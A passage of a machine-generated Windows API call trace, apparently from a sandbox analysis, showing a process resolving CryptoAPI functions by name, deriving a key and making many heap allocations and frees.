lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca550, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0097.017] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0097.086] TranslateMessage (lpMsg=0x144eb54) returned 0 [0097.086] DispatchMessageW (lpMsg=0x144eb54) returned 0x0 [0097.086] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0097.086] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0097.086] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0097.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0097.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0097.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0097.088] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0097.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0097.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0097.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0097.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fe8 [0097.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0097.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0097.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0097.091] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0097.091] CryptDestroyHash (hHash=0x41ac040) returned 1 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0097.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0097.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0097.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0097.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0097.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0097.093] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0097.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0097.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0097.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.096] HeapFree (in: 